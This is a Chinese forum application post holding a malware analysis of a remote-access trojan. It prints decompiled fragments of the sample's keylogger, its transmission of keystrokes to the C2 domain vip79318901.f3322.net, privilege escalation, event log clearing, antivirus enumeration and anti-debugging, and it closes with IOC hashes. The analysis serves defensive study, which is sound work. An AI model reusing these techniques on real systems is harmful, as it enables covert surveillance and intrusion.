申请标题:申请会员 ID:An_spectator
1、申 请 I D:An_spectator
2、个人邮箱:3020025192@qq.com
3、原创技术文章:技术文章标准请参考论坛精华帖
样本分析在处理日常的任务中发现可疑IP:172.247.132.146,简单查看是一个保存文件的站点,只保存了shoves.exe文件:该文件疑似远控木马,现做简要分析。沙箱分析程序运行后该程序会不断地向域名为vip79318901.f3322.net的主机发送请求:ApataDNS:inetsim:存在修改注册表以自启动:修改读取镜像劫持相关的注册表:其他有关网络配置的敏感操作:不存在文件的写入操作,但存在大量的文件读操作用于导入函数:
PE文件分析程序未加壳:恶意代码存在自定义的baidu段:内部使用了RC5算法进行加/解密:程序最开始使用GetStartupInfoA进行简单的反调试:[td]1
2
3
4
5
6
7
8
9 | .text:00401F9A lea eax, [ebp+StartupInfo]
.text:00401F9D push eax ; lpStartupInfo
.text:00401F9E call ds:GetStartupInfoA
.text:00401FA4 call __wincmdln
.text:00401FA9 mov [ebp+lpCmdLine], eax
.text:00401FAC test byte ptr [ebp+StartupInfo.dwFlags], 1
.text:00401FB0 jz short loc_401FB8
.text:00401FB2 movzx eax, [ebp+StartupInfo.wShowWindow]
.text:00401FB6 jmp short loc_401FBB | 对程序部分指令解密,相关操作存放在恶意代码自定义的baidu段中:[td]1
2
3
4 | baidu:00410213 52 push edx
baidu:00410214 50 push eax
baidu:00410215 68 BC 60 41 00 push offset byte_4160BC
baidu:0041021A E8 91 FD FF FF call decrypt_40FFB0 | 解密是对0x4160BC开始的一段数据的操作,完成后内存从0x4160BC开始是一个DLL文件,该程序的主要攻击行为都在这个dll中:DLL文件仅有一个导出函数fuckyou:DllMain分析DllMain主要是一些初始化的操作:[td]1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68 | GetInputState();
cur_thread_id = GetCurrentThreadId();
PostThreadMessageA(cur_thread_id, 0, 0, 0);
GetMessageA(&Msg, 0, 0, 0); //
//
if ( dword_10011FBC ) // 通过检测当前进程的父进程是不是explorer来进行反调试
{
explorer_pid = get_explore_pid_100070B0();
cur_pro_id = GetCurrentProcessId();
if ( (explorer_pid == 0) == get_parent_process_pid_10007000(cur_pro_id) )
ExitProcess(0);
} //
//
VersionInformation.dwOSVersionInfoSize = 148;
GetVersionExA(&VersionInformation); //
//
if ( &dword_10011FCC != -2 )
create_thread_100080D0(0, 0, download_from_url_10006100, &dword_10011FCC + 2, 0, 0);// 开启一个线程下载文件
//
if ( dword_10011FC8 ) // kill run32dll.exe
kill_run32dll_10005CB0();
if ( !byte_10011FB8 ) // 注册服务相关
//
{
String = 0;
memset(&v25, 0, 0x3FCu);
v26 = 0;
v27 = 0;
Format = '%';
v12 = 's';
v13 = 0;
sprintf(ServiceName_10011CD4, &Format, ServiceName_10011CD4);
ServiceStartTable.lpServiceName = 'nnoC';
ServiceStartTable.lpServiceProc = 'Gtce';
v15 = 'puor';
LOBYTE(v16) = 0;
set_service_reg_10004D50(ServiceName_10011CD4, &ServiceStartTable, &String, 1024);// 注册服务:
// Rspgcu zcltpgnd
//
if ( !lstrlenA(&String) )
{
reg_service_10003050(ServiceName_10011CD4, a1521);
reg_set_10005D20(ServiceName_10011CD4);
}
v9 = init_COM_10006FB0();
wsprintfA(&String2, aS, v9);
if ( dword_10011FB4 )
{
memset(&Dst, 0, 0x104u);
GetModuleFileNameA(0, &Dst, 0x104u);
SHGetSpecialFolderPathA(0, &v18, 43, 0);
lstrcatA(&v18, asc_1001172C);
lstrcatA(&v18, &String2);
lstrcatA(&v18, aExe);
MoveFileA(&Dst, &v18);
}
else
{
memset(&Filename, 0, 0x104u);
GetModuleFileNameA(0, &Filename, 0x104u);
}
Sleep(0x32u);
v10 = create_thread_100080D0(0, 0, sub_100063D0, 0, 0, 0);
WaitForSingleObject(v10, 0xFFFFFFFF);
CloseHandle(v10);
while ( 1 )
Sleep(1000000u);
} | 包括反调试,初始化服务,开启服务等操作。程序的主要攻击方法存放在attackfun_100063D0()中:[td]1
2
3
4
5
6
7 | v0 = CreateMutexA(0, 0, &Name); // 确保只有一个运行实例
if ( v0 && GetLastError() == ERROR_ALREADY_EXISTS )
{
ReleaseMutex(v0);
CloseHandle(v0);
exit(0);
} | [td]1
2
3
4
5
6
7
8 | if ( dword_10011FC0 )
{
sub_10003AB0(v23, v8);
LOBYTE(v24) = 1;
input_record_10003AE0();
LOBYTE(v24) = 0;
sub_10003A60(v23);
} | [td]1
2
3
4 | int input_record_10003AE0()
{
return create_thread_100080D0(0, 0, key_logger_100026A0, 0, 0, 0);
} | 使用GetKeyState, GetAsyncKeyState实现击键记录:[td]1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42 | v3 = GetKeyState(16);
v4 = *&byte_100113DC[v2 * 4];
v5 = v3;
if ( ((GetAsyncKeyState(*&byte_100113DC[v2 * 4]) >> 8) & 0x80u) == 0 )
{
v6 = *(&v8 + v4);
if ( v6 )
{
*(&v8 + v4) = 0;
if ( v4 == 8 )
{
lstrcatA(&String, String2);
sub_10002450(&String);
}
else if ( lstrlenA(&String) <= 550 )
{
if ( v4 != 13 )
{
if ( v6 % 2 == 1 )
{
lstrcatA(&String, off_10011248[v2]);
}
else if ( !(v6 % 2) )
{
lstrcatA(&String, off_100110B4[v2]);
}
goto LABEL_35;
}
lstrcatA(&String, aEnter);
sub_10002450(&String);
}
else
{
sub_10002450(&String);
}
memset(&String, 0, 0x258u);
}
}
else if ( GetKeyState(20) && v5 > -1 && v4 > '@' && v4 < ']' )
{
*(&v8 + v4) = 1;
} | 将击键记录的内容传输给url:vip79318901.f3322.net :[td]1
2
3
4
5
6
7
8
9
10
11 | else
{
v1 = *&asc_10011BA4;
lstrcatA(&String1, aVip79318901F33);
}
if ( strcmp(&String1, byte_10013470) )
{
v3 = GetTickCount();
if ( connect_url_10001D00(v8, &String1, v1) )
break;
} |
- sub_10003AB0(v23, v8)通过检索函数表来调用switch_case_10003D30:
[td]1
2 | *v2 = &off_1000C30C;
v2[1004] = 0 | [td]1
2
3 | .rdata:1000C30C off_1000C30C dd offset sub_10003A40 ; DATA XREF: sub_100039F0+11↑o
.rdata:1000C30C ; sub_10003A60+C↑o ...
.rdata:1000C310 dd offset switch_case_10003D30 | switch_case_10003D30函数通过判断不同的情况操作:提权:[td]1
2 | case 0x70u:
v5 = create_thread_100080D0(0, 0, privilege_10002CE0, *(this[1] + 72), 0, 0); | 提权的关键函数通过OpenProcessToken得到进程的令牌句柄,使用LookupPrivilegeValue查询进程权限,最后用AdjustTokenPrivileges函数提升权限:[td]1
2
3
4 | LookupPrivilegeValueA(0, Name, NewState.Privileges);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Attributes = 2;
AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0, 0, 0); | 删除日志:[td]1
2 | case 4u:
delete_event_log_10002E20(a2[1]); | 删除日志函数通过OpenEventLog函数打开日志文件,如果成功打开,调用ClearEventLog函数清除日志文件,最后调用CloseEventLog函数关闭日志文件:[td]1
2
3
4
5
6
7
8
9
10
11
12 | do
{
v3 = OpenEventLogA(0, *v2);
v4 = v3;
if ( v3 )
{
ClearEventLogA(v3, 0);
CloseEventLog(v4);
}
++v2;
result = v8-- - 1;
} | 弹出MessageBox:[td]1
2
3 | case 0xAu:
v5 = create_thread_100080D0(0, 0, msgbox_10002DD0, (a2 + 1), 0, 0);
goto LABEL_22; | [td]1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40 | memset(&v174, 0, 0x40u);
v1 = LoadLibraryA(aKernel32Dll_1);
creat_tool_help = GetProcAddress(v1, aCreatetoolhelp);
pro32_first = GetProcAddress(v1, aProcess32first);
pro32_next = GetProcAddress(v1, aProcess32next);
pro_list = (creat_tool_help)(2, 0);
if ( pro_list )
{
v175 = 296;
if ( !strstr(Str, SubStr) )
{
v4 = &Str;
do
{
if ( (pro32_first)(pro_list, &v175) )
{
v5 = *v4;
while ( lstrcmpiA(v5, &String2) )
{
if ( !(pro32_next)(pro_list, &v175) )
goto LABEL_10;
}
lstrcatA(lpString1, v4[1]);
lstrcatA(lpString1, SubStr);
}
LABEL_10:
v6 = v4[2];
v4 += 2;
v175 = 296;
}
while ( !strstr(v6, SubStr) );
}
}
CloseHandle(pro_list);
result = lstrlenA(lpString1);
if ( !result )
result = lstrcpyA(lpString1, asc_100121B8);
if ( v1 )
result = FreeLibrary(v1);
return result; | 查询的杀毒软件列表如下:导出函数fuckyou导出函数fuckyou的功能与DllMain基本一致,主要也是调用attackfun_100063D0来进行恶意行为以及一些保持服务常驻的操作:其他一些可疑操作程序还存在写入文件到%SystemDirectory%\1521.key的操作,配合击键记录函数进行击键记录:[td]1
2
3
4
5 | GetSystemDirectoryA(&Buffer, 0x104u);
strcat(&Buffer, asc_1001172C);
strcat(&Buffer, a1521);
strcat(&Buffer, aKey);
v1 = CreateFileA(&Buffer, 0x40000000u, 2u, 0, 4u, 0x80u, 0); | 但是在沙箱运行中并为发现文件的写入操作。总结该程序是RAT木马,具有提权,击键记录,删除日志,反杀毒软件等功能,可用于建立僵尸网络,发送垃圾邮箱来进行APT攻击。该程序在一些主流的杀毒软件测试中均未报毒,具有很强的威胁性:相关IOC[td]list | value | MD5 | ae318e417963fbaec1c0664b9162b63d | SHA-1 | 965b9b5be709e95950fd10ab1614edf3ab1ae70d | SHA-256 | 10eeadc0c512fa8d52ee66f3d181f2ec9de65cba5c08559eea20b60d41867876 | Vhash | 04505666151d15104012z180055mz6gz | Authentihash | 058ca13631c7f65271190aaad5b67bc259d18c0b71d4fc368820b150facc655f | Imphash | 926997c7dd52b150779d1291ece24039 | SSDEEP | 3072:3abe6nVEb7Mt+e74m3mOsr5PrQ+EGCZs+RbjySnKv:3yeH/e7hAr5DQ+yZvqSK | File type | Win32 EXE | Magic | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | File size | 428.00 KB (438272 bytes) | PEiD packer | Microsoft Visual C++ |
|